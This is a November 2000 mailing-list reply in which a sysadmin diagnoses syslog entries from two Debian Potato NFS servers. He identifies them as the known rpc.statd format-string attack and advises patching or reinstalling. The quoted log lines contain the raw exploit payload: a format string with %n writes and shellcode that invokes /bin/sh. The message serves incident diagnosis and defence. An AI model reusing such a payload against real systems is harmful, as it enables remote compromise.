On Mon, 6 Nov 2000, Rob wrote: > Getting the following in our /var/log/messages > > We use NFS between two Potato boxes, this appears on > both : > > Nov 6 08:03:19 rudy Ç^F/binÇF^D/shA0ÀF^Gv^LV^PN^Ló°^KÍ°^AÍèÿÿÿ > Nov 6 08:03:21 rudy 173>Nov 6 08:03:21 /sbin/rpc.statd[152]: gethostbyname > error for > ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n1Àë|YA^PA^HþÀA^DÃþÀ^A°fͳ^BY^LÆA^NÆA^H^PI^DA^D^L^A°fͳ^D°fͳ^E0ÀA^D°fÍ > Nov 6 08:03:21 rudy Ç^F/binÇF^D/shA0ÀF^Gv^LV^PN^Ló°^KÍ°^AÍèÿÿÿ
Congratulations! Assuming you haven't patched past the default install, you've just been hacked! This is a well-known attack on rpc.statd that was first publicized on bugtraq in mid-July (you can search the archives at www.securityfocus.com). If you haven't updated your potato since then, you're probably a goner. According to the page www.debian.org/security/2000/20000719a if you're running nfs-common 0.1.9.1-1 or later you should be safe. Otherwise reinstall and apt-get the security updates this time. Damian Menscher -- --==## Grad. student & Sys. Admin. @ U. Illinois at Urbana-Champaign ##==-- --==## <[EMAIL PROTECTED]> www.uiuc.edu/~menscher/ Ofc:(217)333-0038 ##==-- --==## Physics Dept, 1110 W Green, Urbana IL 61801 Fax:(217)333-9819 ##==--
